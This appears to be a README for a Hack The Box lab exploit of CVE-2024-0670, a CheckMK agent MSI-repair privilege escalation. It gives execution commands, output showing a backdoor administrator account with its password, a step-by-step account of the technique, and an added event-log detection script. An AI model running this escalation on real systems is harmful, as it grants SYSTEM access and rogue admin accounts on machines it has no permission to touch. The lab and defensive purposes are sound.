## https://sploitus.com/exploit?id=3F58B0E8-968C-5526-9652-3C321B0F8C30
# CVE-2024-0670 - CheckMK Agent MSI Repair Privilege Escalation (NanoCorp HTB)

This repository contains a PowerShell script used to exploit **CVE-2024-0670** on the **NanoCorp** machine from Hack The Box. The vulnerability allows a low-privileged user to abuse the CheckMK Windows Agent MSI repair functionality and execute arbitrary commands with **SYSTEM** privileges.

> **Note:** This exploit was developed for the NanoCorp Hack The Box machine and may require modification before use in other environments.
>
> **Disclaimer:** This repository is provided for educational purposes and authorized security testing only. Use it only on systems you own or have explicit permission to test.

## Usage

### Prerequisites

* [RunasCs.exe](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/RunasCs.exe) (used to execute commands as another user)

### Quick Start

1. Upload [RunasCs.exe](https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/RunasCs.exe) (required to run the exploit as the `web_svc` user).

2. Execute the script as the `web_svc` user:

   ```cmd
   .\RunasCs.exe "web_svc" "YourWebSvcPassword" "powershell -ExecutionPolicy Bypass -File C:\ProgramData\CVE-2024-0670-NanoCorp.ps1"
   ```

3. Wait for the MSI repair process to complete. This may take a few minutes.

4. Once finished, the script will output credentials for the newly created local administrator account:

   ```text
   A new User added as administrator with the following credentials: dfdxarjy Password123@
   ```

5. Verify successful privilege escalation:

   ```bash
   nxc smb nanocorp.htb -u "dfdxarjy" -p "Password123@" -k
   ```

   Expected output:

   ```text
   [+] nanocorp.htb\dfdxarjy:Password123@ (Pwn3d!)
   ```

---

## Description

The vulnerability allows a low-privileged user (such as `web_svc`) to escalate privileges to **NT AUTHORITY\SYSTEM** by abusing the Windows Installer repair functionality used by the CheckMK Agent.

The script performs the following actions:

1. Locates the installed CheckMK MSI package on the target system.
2. Writes a batch file to `C:\Windows\Temp` containing commands to create a local user account.
3. Triggers a repair of the MSI package using `msiexec /fa`.
4. The repair process executes the batch file with SYSTEM privileges.
5. The batch file creates a local administrator account by adding the user to the local `Administrators` group.
6. Temporary files are removed after execution.
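
For defenders, the steps above leave a trail in the Windows event logs: an MSI reconfiguration followed closely by SYSTEM adding a member to the local `Administrators` group. The following PowerShell is an added detection example, not part of this repository. The function name, the `Check ?MK` product-name pattern and the time window are assumptions, and it requires an elevated session with "Audit Security Group Management" enabled so that event 4732 is logged.

```powershell
# Added example (not from the repository): correlate MSI repairs of the agent
# with SYSTEM-initiated additions to the local Administrators group.
function Find-MsiRepairAdminAddition {
    param(
        [int]$LookbackHours = 24,
        [int]$WindowMinutes = 10,                 # assumed correlation window
        [string]$ProductPattern = 'Check ?MK'     # assumed product display name
    )
    $start = (Get-Date).AddHours(-$LookbackHours)

    # MsiInstaller event 1035: "Windows Installer reconfigured the product" (repair).
    $repairs = Get-WinEvent -FilterHashtable @{
        LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1035; StartTime = $start
    } -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $ProductPattern }

    # Security event 4732: a member was added to a security-enabled local group.
    $adds = Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4732; StartTime = $start
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $evt  = $_
        $data = @{}
        foreach ($d in ([xml]$evt.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $evt.TimeCreated
            GroupSid  = $data['TargetSid']        # group that was modified
            ActorSid  = $data['SubjectUserSid']   # account that made the change
            MemberSid = $data['MemberSid']        # account that was added
        }
    } | Where-Object { $_.GroupSid -eq 'S-1-5-32-544' -and $_.ActorSid -eq 'S-1-5-18' }

    # The batch file runs during the repair, so the group change can land shortly
    # before or after the 1035 record; compare on absolute time difference.
    foreach ($r in $repairs) {
        foreach ($a in $adds) {
            $delta = [math]::Abs(($a.Time - $r.TimeCreated).TotalMinutes)
            if ($delta -le $WindowMinutes) {
                [pscustomobject]@{
                    RepairTime = $r.TimeCreated
                    AddTime    = $a.Time
                    MemberSid  = $a.MemberSid
                    Repair     = $r.Message
                }
            }
        }
    }
}

Find-MsiRepairAdminAddition | Format-List
```

Any row returned is worth triage: resolve `MemberSid` to an account name and check whether a matching account creation (Security event 4720) occurred in the same window.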

---

## References

* [CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670)
* [CheckMK Windows Agent MSI Repair Privilege Escalation](https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/)